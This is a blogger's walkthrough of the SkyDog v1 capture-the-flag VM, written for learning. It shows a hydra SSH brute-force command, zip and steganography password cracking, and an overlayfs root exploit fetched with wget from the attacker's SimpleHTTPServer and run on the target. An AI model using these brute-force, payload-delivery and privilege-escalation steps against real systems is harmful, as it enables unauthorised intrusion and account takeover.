SkyDog v1

Here we go again.. let the cursing, late nights, frustration, fun begin.

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

So lets roll up our sleeves, make a pot of coffee and get started – A quick sweep of the local network with nmap reveals our target for this VM

# nmap -sn 192.168.0/24
Nmap scan report for skydogctf.home (192.168.1.86)
Host is up (0.0018s latency).
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC)

Okay, now we have our target in sight, lets see what we have to work with

# nmap -A 192.168.1.86

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-06 17:59 EDT
Nmap scan report for skydogctf.home (192.168.1.86)
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A quick look at http://192.168.1.86 doesn’t show too much, just the following SkyDogCon_CTF.jpg image – well at least I don’t think it’s much and a basic exif view hasn’t turned up anything interesting. Hey maybe the image has something hidden in there but at this stage i’ll assume not and move along.

My interest is currently in the open ssh port (tcp/22) and the paths specified in the robots.txt file… lets start digging and see what we can find. I’ve opened the robots.txt file and we have our first flag as a comment at the top of the file.. .I see how this is going to work sneaky SkyDog

# Congrats Mr. Bishop, your getting good – flag{cd4f10fcba234f0e8b2f60a490c306e6}

Okay, my initial thought at this stage is that the robots.txt file contains every cat and dog from around the neighbourhood to throw me off the trail and seems suspicious so i’ll come back to this in a second. On a side note I did a quick version check of port 22 and got the following

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

I’m trying a couple of things currently which I’ll come back to and explain if they lead anywhere, but while I was reviewing the .jpg I ran the setghide command to see if there was any hidden data

# steghide –extract -sf SkyDogCon_CTF.jpg

So given there’s a password present and prompted for, I manually tried a few regulars with no luck. My next idea is to take the robots.txt file from the http root which seems excessively long, trim it down and see if it contains any keywords to bruteforce the jpg.. to do this I used a tool I’d come across on the Top-Hat-Sec forum called brute.pl

I created a wordlist based off the entries in the robots.txt file with grep and cut using ‘/’ as the delimiter and then ran this output against the jpg

While this was running I gave myself a good kicking in the backside.. what was I doing. Rule number 1 – NEVER assume anything. So back to last night, my original basic exif view of the SkyDogCon_CTF.jpg file was obviously done in a moment of tiredness or laziness. I think I used one of those online versions.. point to note for future – DON’T! While I’m waiting for brute.pl to do it’s thing, I rechecked the .jpg with exiftool and low and behold – output is below, and another flag revealed in the ‘XP Comment’ field :  flag{abc40a2d4e023b42bd1ff04891549ae2}

skydog_exiftool

So looping back to my previously running steghide password bruteforce attempt, I got nothing. Yes there’s a password but I have no idea what it is just yet. That’s no biggie, these things are like a giant jigsaw and a new clue will rear it’s head and give me a nudge in the right direction. One thing i’ve learnt as well, never over analyse these things. 9 times out of 10 the answer is wearing nothing bun a weiner bell and dancing in the shadows..

So my next step is to take the robots file and create a list combined with the main domain IP and then check to see if any are legitimate.. there’s so many in here I’m pretty confident it’s just basically security through obscurity. So how can I do this.. Well, this is my approach and to be honest, I have no idea what i’m doing, so there will be better ways of doing this. NOTE FROM FUTURE – Use DirBuster!!!

First I save the robots.txt locally, then I cut out everything in the first an second field using a forward slash as the delimiter (skydog_index.txt |cut -d “/” -f 2,3), I use -s to hide any lines that don’t have a ‘/’ and then I also remove any duplicates with the ‘sort -u’ command. You can make a bash file.. or something else to do this, but I just combined it to a single line and run it as follows

# for url in $(cat skydog_index.txt |cut -d “/” -f 2,3 -s |sort -u);do wget http://192.168.1.86/$url; done

I don’t know how to only output successful connections and hide 404’s, but given it’s not that big I just did a quick scroll through, rather than waste too much time. So here are the juicy bits we’ve got to work with going forward;

http://192.168.1.86/Setec/
Connecting to 192.168.1.86:80… connected.

Setec_Astronomy

Also checking the source code on this page seems to hold a clue “(“NSA-Agent-Abbott”; AKA Darth Vader)” a reference to James Earl Jones who plays NSA Agent Bernard Abbott in the movie Sneakers.. also in that movie “Setec Astronomy” is an anagram of “too many secrets”… still, not many bells ringing for me at this stage.

source of sectec

In a moment of madness I create a password list using CeWL from the Sneakers Wiki and also one from the Wiki for James Earl Jones (example below) but I haven’t done any morphing or manipulating of the resulting text file.

# cewl -d 1 -m 4 -v -w jamesPW.txt http://en.wikipedia.org/wiki/James_Earl_Jones

That would be too easy and as expected I failed yet again.. but that’s what this is all about. Fail until you succeed or put in a bit more effort aka Try Harder! 

Taking a step back and going back to the html source code we can see that the Sectec_Astromomy.jpg is located in a subdirectory called ./Astronomy so lets check that out

Index of sectec.astronomy

I download Whistler.zip and try to unzip it – fail.. password protected grrr. But I can see it contains two files Flag.txt and QuesttoFindCosmo.txt but what to do now. Before I waste too much time creating various custom password lists i’ll try running the standard rockyou.txt password list against it using the fcrackzip tool and see how I go..

yourmother

Finally – PASSWORD FOUND!!!!: pw == yourmother

We have Flag #3 Who Can You Trust? flag{1871a3c1da602bf471d3d76cc60cdb9b} = yourmother. And the QuesttoFindCosmo.txt file contains the following clue:

Time to break out those binoculars and start doing some OSINT

Looks like this challenge is about to exit the VM and enter the real world for a while.. this could be interesting. Lets see where we end up in the Rabbit hole.. Everything I think I’ve got to go on so far is;

The three flags
flag{cd4f10fcba234f0e8b2f60a490c306e6}     = Bots
flag{abc40a2d4e023b42bd1ff04891549ae2}    = Welcome Home
flag{1871a3c1da602bf471d3d76cc60cdb9b}     = yourmother

“NSA-Agent-Abbott”; AKA Darth Vader a potential reference to James Earl Jones who plays NSA Agent Bernard Abbott in the movie Sneakers

The zip file called Whistler – possibly a reference to the Sneakers character Irwin ‘Whistler’ Emery

Text file names QuesttoFindCosmo.txt or “Quest to Find Cosmo” – Another character in Sneakers called  Cosmo who was played by Ben Kingsley. 

Maybe one of the remaining three flags hold a clue for the next step?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

I’m stuck with two stego images that I need passwords for and two ports open on the target (22 and 80) that I could do more with

Okay so what have I been doing for the last 24 hours – when I wasn’t at work that is… So I tried a multitude of brute force attacks on the .jpg files, first using brute.pl, and the I moved to a new tool as suggested and provided by TAPE in the THS forums. check out https://github.com/adaywithtape/stegbrute/blob/master/stegbrute.sh for brute forcing stego files. The password lists I used were created with CeWL and ripped from the wikis of James Earl Jones, Sneakers (the movie) and also from the Screen play of the Sneakers movie.

Anyway.. loooong story short, a few beers, a bowl of pop-corn, and session of GoT and endless patience.. I came to a dead end (for now) with the brute forcing so will move on and come back with a fresh head later on.

COMMENT FROM THE FUTURE.. So I think we all agree trying to solve these VulnHub VM’s is about learning and growing. It would seem at this stage – and I could be wrong (It wouldn’t be the first time and it most certainly wont be the last) but the two images I’ve been trying to bruteforce are most likely quite innocent. Why do I say this?

Firstly I became suspicious and ran #steghide –info on a “clean” jpeg image it would seem that even in the absence of stenography you still get prompted for a password. Oh dear. I think I just learnt a valuable and time consuming lesson. So what to do from here? I’m sure there are tools available like steg which I’ll look into, but I believe technically, every JPEG file has a beginning or header, called “Start of Image” and a trailer called “End of Image”, every JPEG file starts from the binary value ‘0xFFD8‘ and ends by the binary value ‘0xFFD9‘.

A quick check of my jpeg files in a hex editor confirm this, so I slowly hang my head, reflect on a lesson learnt then plan my next move. You can also check for any extra content after EOI (End of Image) marker by using the following;

# hexdump -C image.jpg | less +/”ff d9″
# hexdump -C image.jpg | more +/”ff d9″

Chin up – I’ve now got this great list of Sneakers related words and the next step is to run the OWASP Dirbuster app against http://192.168.1.86/ with my custom list and see what we can shake out of the bush. Two steps forward, one step back, but we’re still making progress.

Bingo Bongo Bango – we have a new lead.. I can see a new directory containing two new files

http://192.168.1.86/PlayTronics/
http://192.168.1.86/PlayTronics/flag.txt
http://192.168.1.86/PlayTronics/companytraffic.pcap

A quick look at the new flag.txt file and we have the following flag{c07908a705c22922e6d416e0e1107d99}  = leroybrown

Next I fire up Wireshark and pull up our companytraffic.pcap file.. Again there will be faster and more efficient ways to do this but I filtered by TCP stream and painfully checked each stream until I found something interesting – In this case TCP stream 45 is an HTTP GET request for an mp3 file. Another method which would have been quicker is just click on File > Export Objects > HTTP and you’ll see the audio/mpeg content and you can download it directly from here as well.

Capture_companytrafficPCAP

Playing the audio file we hear the following recorded message “Hi, my name is Werner Brandes. My voice is my passport. Verify Me.” – Dr. Werner Brandes out of Sneakers.

I’ve also tried various checks of the sound file using exif readers and spectrum analysers to find any hidden information but with no luck at this stage so will move on for now. Yet again this is something completely new so will have to spend some more time on it if I can’t make progress elsewhere.

Well things are feeling okay, I’ve got 4 of the 6 flags, a cold beer and a new lease of energy as we look for flag number 5. I’ve done my dash with what I’ve got so now going to move my focus back to the VM and more specifically the open SSH port.

I took a stab last night running Hydra using my giant password list. The problem is, I have a very large list and no idea what the username might be. I took a guess at ‘WernerBrandes’. One of the things I’ve learnt when it comes to word lists is that there’s a real skill in crafting lists for a specific target. And while I like my current list, it’s not efficient. So i’m going to create a short un-mutated list which can be used for username input and also for the passwords. This will be based specifically off the clues and flags I’ve found so far and a couple of default usernames as shown below.

I’m hanging out for pizza and a beer so this needs to work. I’ll have another try using Hydra to crack the ssh login with my new simplified but specific list.

# hydra -t 5 -V -f -L ssh_list.txt -P ssh_list.txt 192.168.1.86 ssh

Oh..
my…
gosh…
I just pee’d myself a little. Finally something paid off!! I don’t know how long it took as I just left it running, but based on my wordlist above it was finally cracked at 1000 of 1444 possibilities.

[ATTEMPT] target 192.168.1.86 – login “wernerbrandes” – pass “leroybrown” – 1000 of 1444 [child 1]

[22][ssh] host: 192.168.1.86 login: wernerbrandes password: leroybrown
[STATUS] attack finished for 192.168.1.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

So I now can log on through ssh with my new credentials and do a quick check of account and rights using whoami and the id command

screenshot_037

No surprises, I have limited rights, but a quick peek-a-boo into the local /home/wernerbrandes directory and we can see our next flag{82ce8d8f5745ff6849fa7af1473c9b35} = Dr. Gunter Janek. I can also see another user on the system called nemo and i’ll also need to now elevate my privileges.

First thing to do is check the current distro and kernel version to see if we have any options. Recon time!

$ cat /etc/issue && uname -a

Ubuntu 14.04.3 LTS \n \l
Linux skydogctf 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Well this looks like familiar ground. Lets see if we can get something working here. Based on the distro and kernel my first thought from previous experience is to try an overlayfs exploit again. But I hit a snag… The sneaky admin of this box has removed gcc and after downloading an exploit I can’t get it complied on the target. I had a quick look for something in Python with no luck, so I have another idea.

A bit of a long shot but on my Kali box I download and compile the exploit I want to try and use locally, in this case https://www.exploit-db.com/exploits/39166/

screenshot_038

Then I start up a quick session to share the current directory (and exploit file) using my new friend SimpleHTTPServer on port 80 with the following command

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

Now back on my terminal running the ssh session to SkyDog I’ll grab the exploit using wget to my SimpleHTTPServer session, make the exploit executable and run it – Bingo!! Worked like a charm. Quick check and we have root.

screenshot_039

A quick search of the system using the locate command shows the last flag.txt file waiting patiently in the /root/BlackBox directory

# cd /root/BlackBox
# cat flag.txt
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward. /CongratulationsYouDidItroot

We quickly pop over to http://192.168.1.86/CongratulationsYouDidIt then celebrate like it’s 1984!! Job well done!

Big thank you to James Bower for putting in the time and effort on this VM and a tip of my hat to Grey-Matter over at the Top-Hat-Sec community for putting me on to SimpleHTTPServer. Every VM is a learning experience, so thank you all.

 

time_to_relaxSHORT ON TIME? THEN HERE’S THE SUMMARY

Gameplay:

Enumerate target and services
Check exif data on web files
Check robots.txt
Find sub-directorys in web
Bruteforce found zip file
Custom list from OSINT / CeWL
Dirbuster to find more web directories
Check source code of html pages
Analyse found pcap with Wireshark
Extract audio from stream
Custom wordlist from clues and key words
Breteforce (Hydra) ssh connection
Escalate to Root through Overlayfs exploit
Pillage and capture hidden flags along the way

Exploits used:

CVE-2015-1328Overlayfs Local Root

Websites, Tools and Commands Used:

https://www.exploit-db.com
nmap
locate
CeWL
steghide
brute.pl
SimpleHTTPServer
gcc
chmod
fcrackzip
dirbuster
grep
cut
ssh
hexdump
Wireshark
hydra
python
wget
steganography

Flags:

flag{cd4f10fcba234f0e8b2f60a490c306e6}     = Bots
flag{abc40a2d4e023b42bd1ff04891549ae2}    = Welcome Home
flag{1871a3c1da602bf471d3d76cc60cdb9b}     = yourmother
flag{c07908a705c22922e6d416e0e1107d99}   = leroybrown
flag{82ce8d8f5745ff6849fa7af1473c9b35}       = Dr. Gunter
flag{b70b205c96270be6ced772112e7dd03f}    = ?

screenshot_011

8bit kiwi

About the author